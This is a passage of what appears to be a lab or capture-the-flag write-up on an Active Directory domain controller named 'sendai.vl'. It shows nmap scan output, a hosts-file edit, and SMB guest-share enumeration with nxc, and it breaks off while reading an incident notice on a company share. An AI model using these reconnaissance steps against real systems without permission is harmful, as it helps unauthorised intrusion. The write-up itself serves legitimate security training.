| +a9HoEcqz5mdon4OK/ZDWokCC5m2JVXwdglm04SeU5pTLqIuvkvrFPF6xByTo6OG
| w0mD55O3dpqu2AXPHpxmSszZUHZedZ7oZYHah9X/vlkCAwEAAaOCAywwggMoMC8G
| CSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAd
| BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgG
| CSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDAL
| BglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQME
| AQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTMwODU4NzI3NDItNTcwOTcyODIzLTczNjc2NDEz
| Mi0xMDAwMDgGA1UdEQQxMC+gHwYJKwYBBAGCNxkBoBIEEB6FyoYBEbdOhIdd+rz6
| DSGCDGRjLnNlbmRhaS52bDAdBgNVHQ4EFgQUvcswuDmO6a7M1hAuQYYIq7/AN/Qw
| HwYDVR0jBBgwFoAUSemJy2wGmS2/ToDZ6jjJnKaooz4wgcMGA1UdHwSBuzCBuDCB
| taCBsqCBr4aBrGxkYXA6Ly8vQ049c2VuZGFpLURDLUNBLENOPWRjLENOPUNEUCxD
| Tj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1
| cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0
| P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgbwGCCsGAQUF
| BwEBBIGvMIGsMIGpBggrBgEFBQcwAoaBnGxkYXA6Ly8vQ049c2VuZGFpLURDLUNB
| LENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jQUNlcnRpZmljYXRlP2Jh
| c2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0B
| AQsFAAOCAQEAhxfDqVgK+WpagVPhh89RuqlcLnfnYgeBTRQTEwrzI7OZ4SF1//04
| eSwGSqxNPoShh7oMGO2FE/ad5LxFu1KdS+zTWyXCw4B9HgXKOdM1wmxpJujwFyXt
| JGZHrnQzaa0ePj9i/tpjk/D0Q0gurbAkjTlEw5FAitraZuYOT7SVf8bL0u/6RIBo
| syB2pUE3O//Dj+O7t2xOj9swvokQ6Dnlq0VN313aIVrPrgFnUdfVpd3B2yoXXziD
| KZ2i9fc55HIMZ5VM/aN5M7UT1KqdD7BoEG8b3bq0gi0iCCsxjQyRMsw5Dd3UcCuQ
| R4i0WBM2m9vQoSf/jw1s4S1uQ69/cK9iwQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
443/tcp   open  ssl/http      syn-ack ttl 127 Microsoft IIS httpd 10.0
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-18T12:39:21
| Not valid after:  2024-07-18T00:00:00
| MD5:   3223:91f5:f1f7:4e16:738e:382d:053e:c7fa
| SHA-1: 5282:f809:dcc9:8d53:e9a1:065a:25a1:c741:fa2c:4bc5
| -----BEGIN CERTIFICATE-----
| MIIC9TCCAd2gAwIBAgIQKG7SWIn2M6tPyGomAHBoSjANBgkqhkiG9w0BAQsFADAX
| MRUwEwYDVQQDEwxkYy5zZW5kYWkudmwwHhcNMjMwNzE4MTIzOTIxWhcNMjQwNzE4
| MDAwMDAwWjAXMRUwEwYDVQQDEwxkYy5zZW5kYWkudmwwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQDcBXcByvqbxTJwsmevy4Bj83CH0vCBzz3cev/4fxMG
| Ill5epHVaQJSNAwCRseP2KJYUqfpUaZuJTjhvtm9V6uRdhBNy9xtMH/kGfx6KVeO
| TViixsc/X5DCROAcjUhnsXJa1pmtcTItDn+f0VMYbjHsMGqM+yOeguPSXPztnMWZ
| TtuwKH/EnyUIOtxo3tIuCLthRt4W36r6I9kkYmpWhPyuhVssAFuQ8fL7JyVTFWBE
| cvG9YO0a4B8+t4PBnUKdMf8n0I6viITltxQpSby1Atlx1lF9OngDK/sKnxiYSzFw
| 64bOIRU8EVAo8dCab5ZrHM2H2KphvaFWccccJGytsz2FAgMBAAGjPTA7MAsGA1Ud
| DwQEAwIEsDATBgNVHSUEDDAKBggrBgEFBQcDATAXBgNVHREEEDAOggxkYy5zZW5k
| YWkudmwwDQYJKoZIhvcNAQELBQADggEBAB9DGOlZwCpk4UGmyYa7R+D924WY6QQ7
| nHLlL/F1KKXY29Ps2WKj4EwPkWrwBmMy6T5rIyJJIIuM4SIXWeXCjOo7RcLkYoM4
| eyONMuzZINzzr83EypJbygJVt4wPlYPJpkP8Xsl4Y3RCYiRqVeDmW+sUfOh4NmBo
| jS9ra3d/LtStdVbMGtWEIXGISSZN0v5ygCAQMUSrcCbvDJESHJrALGJ8TLLLn86p
| qivJSaN69CybqAILhPph0/yb7iBG4LH06LXq7Ros7r5c8kaMjELOHSb+DsiDfGfM
| kYMg/u4NFqroRzmHFo1Z0H/vN4Au33hmsj6pCVzGnQDMs2/mDAfLKLg=
|_-----END CERTIFICATE-----
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:dc.sendai.vl
| Issuer: commonName=sendai-DC-CA/domainComponent=sendai
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-18T12:30:05
| Not valid after:  2026-08-18T12:30:05
| MD5:   879e:fbc1:988b:964a:e183:6735:66b8:9f3c
| SHA-1: 099e:0fbb:349b:7fb1:35de:6acb:77a4:c3e5:d0e1:4578
| -----BEGIN CERTIFICATE-----
| MIIGFTCCBP2gAwIBAgITVwAAAATYPsFplvexvwAAAAAABDANBgkqhkiG9w0BAQsF
| ADBDMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZzZW5kYWkx
| FTATBgNVBAMTDHNlbmRhaS1EQy1DQTAeFw0yNTA4MTgxMjMwMDVaFw0yNjA4MTgx
| MjMwMDVaMBcxFTATBgNVBAMTDGRjLnNlbmRhaS52bDCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAM/zoBh9/Vf9Dg2a7ZByPbs7K7m34f14/NBkNL+qvWwW
| A6uVwcXtdqZTm2m/ihyTcq1HCADBVR57BcB0S6nkIIqoTis/ATH+E4zj1Mpek3ml
| IxXv3yer14cVtP5cCmlm92rFMLbdAmnH3VyEGoE0pg64OtwPbAuYHTpnuaRQvdfl
| dWILGe0qsBahDpOhgxnpxLZFuacK3mCy45mz8T1iwYpMLo9WE7z2o/THjP58dCJ3
| +a9HoEcqz5mdon4OK/ZDWokCC5m2JVXwdglm04SeU5pTLqIuvkvrFPF6xByTo6OG
| w0mD55O3dpqu2AXPHpxmSszZUHZedZ7oZYHah9X/vlkCAwEAAaOCAywwggMoMC8G
| CSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAd
| BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgG
| CSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDAL
| BglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQME
| AQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTMwODU4NzI3NDItNTcwOTcyODIzLTczNjc2NDEz
| Mi0xMDAwMDgGA1UdEQQxMC+gHwYJKwYBBAGCNxkBoBIEEB6FyoYBEbdOhIdd+rz6
| DSGCDGRjLnNlbmRhaS52bDAdBgNVHQ4EFgQUvcswuDmO6a7M1hAuQYYIq7/AN/Qw
| HwYDVR0jBBgwFoAUSemJy2wGmS2/ToDZ6jjJnKaooz4wgcMGA1UdHwSBuzCBuDCB
| taCBsqCBr4aBrGxkYXA6Ly8vQ049c2VuZGFpLURDLUNBLENOPWRjLENOPUNEUCxD
| Tj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1
| cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0
| P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgbwGCCsGAQUF
| BwEBBIGvMIGsMIGpBggrBgEFBQcwAoaBnGxkYXA6Ly8vQ049c2VuZGFpLURDLUNB
| LENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jQUNlcnRpZmljYXRlP2Jh
| c2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0B
| AQsFAAOCAQEAhxfDqVgK+WpagVPhh89RuqlcLnfnYgeBTRQTEwrzI7OZ4SF1//04
| eSwGSqxNPoShh7oMGO2FE/ad5LxFu1KdS+zTWyXCw4B9HgXKOdM1wmxpJujwFyXt
| JGZHrnQzaa0ePj9i/tpjk/D0Q0gurbAkjTlEw5FAitraZuYOT7SVf8bL0u/6RIBo
| syB2pUE3O//Dj+O7t2xOj9swvokQ6Dnlq0VN313aIVrPrgFnUdfVpd3B2yoXXziD
| KZ2i9fc55HIMZ5VM/aN5M7UT1KqdD7BoEG8b3bq0gi0iCCsxjQyRMsw5Dd3UcCuQ
| R4i0WBM2m9vQoSf/jw1s4S1uQ69/cK9iwQ==
|_-----END CERTIFICATE-----
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:dc.sendai.vl
| Issuer: commonName=sendai-DC-CA/domainComponent=sendai
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-18T12:30:05
| Not valid after:  2026-08-18T12:30:05
| MD5:   879e:fbc1:988b:964a:e183:6735:66b8:9f3c
| SHA-1: 099e:0fbb:349b:7fb1:35de:6acb:77a4:c3e5:d0e1:4578
| -----BEGIN CERTIFICATE-----
| MIIGFTCCBP2gAwIBAgITVwAAAATYPsFplvexvwAAAAAABDANBgkqhkiG9w0BAQsF
| ADBDMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZzZW5kYWkx
| FTATBgNVBAMTDHNlbmRhaS1EQy1DQTAeFw0yNTA4MTgxMjMwMDVaFw0yNjA4MTgx
| MjMwMDVaMBcxFTATBgNVBAMTDGRjLnNlbmRhaS52bDCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAM/zoBh9/Vf9Dg2a7ZByPbs7K7m34f14/NBkNL+qvWwW
| A6uVwcXtdqZTm2m/ihyTcq1HCADBVR57BcB0S6nkIIqoTis/ATH+E4zj1Mpek3ml
| IxXv3yer14cVtP5cCmlm92rFMLbdAmnH3VyEGoE0pg64OtwPbAuYHTpnuaRQvdfl
| dWILGe0qsBahDpOhgxnpxLZFuacK3mCy45mz8T1iwYpMLo9WE7z2o/THjP58dCJ3
| +a9HoEcqz5mdon4OK/ZDWokCC5m2JVXwdglm04SeU5pTLqIuvkvrFPF6xByTo6OG
| w0mD55O3dpqu2AXPHpxmSszZUHZedZ7oZYHah9X/vlkCAwEAAaOCAywwggMoMC8G
| CSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAd
| BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgG
| CSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDAL
| BglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQME
| AQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTMwODU4NzI3NDItNTcwOTcyODIzLTczNjc2NDEz
| Mi0xMDAwMDgGA1UdEQQxMC+gHwYJKwYBBAGCNxkBoBIEEB6FyoYBEbdOhIdd+rz6
| DSGCDGRjLnNlbmRhaS52bDAdBgNVHQ4EFgQUvcswuDmO6a7M1hAuQYYIq7/AN/Qw
| HwYDVR0jBBgwFoAUSemJy2wGmS2/ToDZ6jjJnKaooz4wgcMGA1UdHwSBuzCBuDCB
| taCBsqCBr4aBrGxkYXA6Ly8vQ049c2VuZGFpLURDLUNBLENOPWRjLENOPUNEUCxD
| Tj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1
| cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0
| P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgbwGCCsGAQUF
| BwEBBIGvMIGsMIGpBggrBgEFBQcwAoaBnGxkYXA6Ly8vQ049c2VuZGFpLURDLUNB
| LENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jQUNlcnRpZmljYXRlP2Jh
| c2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0B
| AQsFAAOCAQEAhxfDqVgK+WpagVPhh89RuqlcLnfnYgeBTRQTEwrzI7OZ4SF1//04
| eSwGSqxNPoShh7oMGO2FE/ad5LxFu1KdS+zTWyXCw4B9HgXKOdM1wmxpJujwFyXt
| JGZHrnQzaa0ePj9i/tpjk/D0Q0gurbAkjTlEw5FAitraZuYOT7SVf8bL0u/6RIBo
| syB2pUE3O//Dj+O7t2xOj9swvokQ6Dnlq0VN313aIVrPrgFnUdfVpd3B2yoXXziD
| KZ2i9fc55HIMZ5VM/aN5M7UT1KqdD7BoEG8b3bq0gi0iCCsxjQyRMsw5Dd3UcCuQ
| R4i0WBM2m9vQoSf/jw1s4S1uQ69/cK9iwQ==
|_-----END CERTIFICATE-----
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:dc.sendai.vl
| Issuer: commonName=sendai-DC-CA/domainComponent=sendai
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-18T12:30:05
| Not valid after:  2026-08-18T12:30:05
| MD5:   879e:fbc1:988b:964a:e183:6735:66b8:9f3c
| SHA-1: 099e:0fbb:349b:7fb1:35de:6acb:77a4:c3e5:d0e1:4578
| -----BEGIN CERTIFICATE-----
| MIIGFTCCBP2gAwIBAgITVwAAAATYPsFplvexvwAAAAAABDANBgkqhkiG9w0BAQsF
| ADBDMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZzZW5kYWkx
| FTATBgNVBAMTDHNlbmRhaS1EQy1DQTAeFw0yNTA4MTgxMjMwMDVaFw0yNjA4MTgx
| MjMwMDVaMBcxFTATBgNVBAMTDGRjLnNlbmRhaS52bDCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAM/zoBh9/Vf9Dg2a7ZByPbs7K7m34f14/NBkNL+qvWwW
| A6uVwcXtdqZTm2m/ihyTcq1HCADBVR57BcB0S6nkIIqoTis/ATH+E4zj1Mpek3ml
| IxXv3yer14cVtP5cCmlm92rFMLbdAmnH3VyEGoE0pg64OtwPbAuYHTpnuaRQvdfl
| dWILGe0qsBahDpOhgxnpxLZFuacK3mCy45mz8T1iwYpMLo9WE7z2o/THjP58dCJ3
| +a9HoEcqz5mdon4OK/ZDWokCC5m2JVXwdglm04SeU5pTLqIuvkvrFPF6xByTo6OG
| w0mD55O3dpqu2AXPHpxmSszZUHZedZ7oZYHah9X/vlkCAwEAAaOCAywwggMoMC8G
| CSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAd
| BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgG
| CSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDAL
| BglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQME
| AQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTMwODU4NzI3NDItNTcwOTcyODIzLTczNjc2NDEz
| Mi0xMDAwMDgGA1UdEQQxMC+gHwYJKwYBBAGCNxkBoBIEEB6FyoYBEbdOhIdd+rz6
| DSGCDGRjLnNlbmRhaS52bDAdBgNVHQ4EFgQUvcswuDmO6a7M1hAuQYYIq7/AN/Qw
| HwYDVR0jBBgwFoAUSemJy2wGmS2/ToDZ6jjJnKaooz4wgcMGA1UdHwSBuzCBuDCB
| taCBsqCBr4aBrGxkYXA6Ly8vQ049c2VuZGFpLURDLUNBLENOPWRjLENOPUNEUCxD
| Tj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1
| cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0
| P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgbwGCCsGAQUF
| BwEBBIGvMIGsMIGpBggrBgEFBQcwAoaBnGxkYXA6Ly8vQ049c2VuZGFpLURDLUNB
| LENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPXNlbmRhaSxEQz12bD9jQUNlcnRpZmljYXRlP2Jh
| c2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0B
| AQsFAAOCAQEAhxfDqVgK+WpagVPhh89RuqlcLnfnYgeBTRQTEwrzI7OZ4SF1//04
| eSwGSqxNPoShh7oMGO2FE/ad5LxFu1KdS+zTWyXCw4B9HgXKOdM1wmxpJujwFyXt
| JGZHrnQzaa0ePj9i/tpjk/D0Q0gurbAkjTlEw5FAitraZuYOT7SVf8bL0u/6RIBo
| syB2pUE3O//Dj+O7t2xOj9swvokQ6Dnlq0VN313aIVrPrgFnUdfVpd3B2yoXXziD
| KZ2i9fc55HIMZ5VM/aN5M7UT1KqdD7BoEG8b3bq0gi0iCCsxjQyRMsw5Dd3UcCuQ
| R4i0WBM2m9vQoSf/jw1s4S1uQ69/cK9iwQ==
|_-----END CERTIFICATE-----
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2025-09-10T20:27:26+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-15T02:26:14
| Not valid after:  2025-10-15T02:26:14
| MD5:   4f35:91c2:3387:873e:3f73:7e83:1f59:fbbb
| SHA-1: 584e:2cc7:1336:099a:33c8:eee9:efe0:6922:8e71:95ce
| -----BEGIN CERTIFICATE-----
| MIIC3DCCAcSgAwIBAgIQKuF1NcIlY4FNpMV86ttHbzANBgkqhkiG9w0BAQsFADAX
| MRUwEwYDVQQDEwxkYy5zZW5kYWkudmwwHhcNMjUwNDE1MDIyNjE0WhcNMjUxMDE1
| MDIyNjE0WjAXMRUwEwYDVQQDEwxkYy5zZW5kYWkudmwwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQDNHgDP8zUjKEITrDV+OcmojamI683UUr5mxScIqNQS
| IDhdLKRgVTB+uRlwLU4XNAtLnN6xVCd1GLAMJwHZDAr084MjDHjwnfUihc5VZImp
| wXRsQunh6Wz0EwPTjTOKkaavM/n4xOBFBNGrtRNMiQj9ClIxNug1/ntLTntuMnWD
| QdG1qzjTr19uazqbXFCHjuWobbM4oxEezJIlgM8JEaliloK4j1h5LPPBwhuZWPUu
| TG/Cr+VnGw4k/SU/jevDINNiweT90MBf7aKTQogJBUpJMd/qwnz6MhUwUPxQyN3u
| lJkM/60PwrGNG49NovTnueupuQLlr0ZK2p1AJL3REpydAgMBAAGjJDAiMBMGA1Ud
| JQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEA
| DrykA5TA6uNu+Cq6GKkoak4ecJ5Bvnosjg69juRiJKU8MnimNshVoJeAAc6CEGuS
| Pr9+dALaUthlI1i083NTyLePICWWE3HIh4x2Vuk6dOF5fVTsQqdFfpXQt83Bus/s
| NFpGXxbDE6a1elVwRFtymPUbSiBLF3cBGm2ud7P+TPCE8tKohF06K1C5f51Css5i
| B/IzGFhKYjHsHRKPYMNbWcQDIX3yNH92S/VBvzS4IauUyvDCbBBKIhq2GhKRfHJp
| boGHCZdqobPNLnd80loYHYdbBoVxMT24YEAKhlbpDfvaKmIEtnVcuBHPlWtJdMfO
| jLGAEg3qGeeiaJ02yGMaug==
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
|   Target_Name: SENDAI
|   NetBIOS_Domain_Name: SENDAI
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: sendai.vl
|   DNS_Computer_Name: dc.sendai.vl
|   DNS_Tree_Name: sendai.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-09-10T20:26:46+00:00
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
52627/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56893/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
56895/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56912/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
57531/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
57550/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=9/10%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68C1DF30%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=2%ISR=10A%TI=I%II=I%SS=S%TS=A)
SEQ(SP=FF%GCD=1%ISR=104%TI=I%II=I%SS=S%TS=A)
OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=M552NW8ST11%O6=M552ST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Uptime guess: 0.016 days (since Wed Sep 10 21:05:00 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-09-10T20:26:50
|_  start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 46518/tcp): CLEAN (Timeout)
|   Check 2 (port 49587/tcp): CLEAN (Timeout)
|   Check 3 (port 64934/udp): CLEAN (Timeout)
|   Check 4 (port 41472/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   46.56 ms 10.10.14.1 (10.10.14.1)
2   46.95 ms 10.129.220.222 (10.129.220.222)

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 10 21:27:28 2025 -- 1 IP address (1 host up) scanned in 197.26 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Updating Hosts File&lt;/h2&gt;
&lt;p&gt;To ensure proper name resolution for Kerberos authentication and other domain operations, I added the target to my local hosts file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ echo -e &quot;10.129.140.152\tDC.sendai.vl\tsendai.vl\tDC&quot; | sudo tee -a /etc/hosts
10.129.140.152	DC.sendai.vl	sendai.vl	DC
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;SMB Enumeration with Guest Access&lt;/h2&gt;
&lt;p&gt;Starting reconnaissance with a guest account enumeration of available SMB shares on the target domain controller:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nxc smb 10.129.220.222 -u &quot;Guest&quot; -p &quot;&quot; --shares
SMB         10.129.220.222  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         10.129.220.222  445    DC               [+] sendai.vl\Guest:
SMB         10.129.220.222  445    DC               [*] Enumerated shares
SMB         10.129.220.222  445    DC               Share           Permissions     Remark
SMB         10.129.220.222  445    DC               -----           -----------     ------
SMB         10.129.220.222  445    DC               ADMIN$                          Remote Admin
SMB         10.129.220.222  445    DC               C$                              Default share
SMB         10.129.220.222  445    DC               config
SMB         10.129.220.222  445    DC               IPC$            READ            Remote IPC
SMB         10.129.220.222  445    DC               NETLOGON                        Logon server share
SMB         10.129.220.222  445    DC               sendai          READ            company share
SMB         10.129.220.222  445    DC               SYSVOL                          Logon server share
SMB         10.129.220.222  445    DC               Users           READ
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The enumeration revealed that guest access was enabled, providing READ access to several shares including a company share named &quot;sendai&quot; and the standard Users share.&lt;/p&gt;
&lt;h2&gt;Exploring the Company Share&lt;/h2&gt;
&lt;p&gt;Since I had read access to the &quot;sendai&quot; share, I explored its contents and discovered an interesting file:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Analyzing the Security Incident Report&lt;/h2&gt;
&lt;p&gt;The incident.txt file contained a revealing security announcement from the IT department:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ cat incident.txt
Dear valued employees,

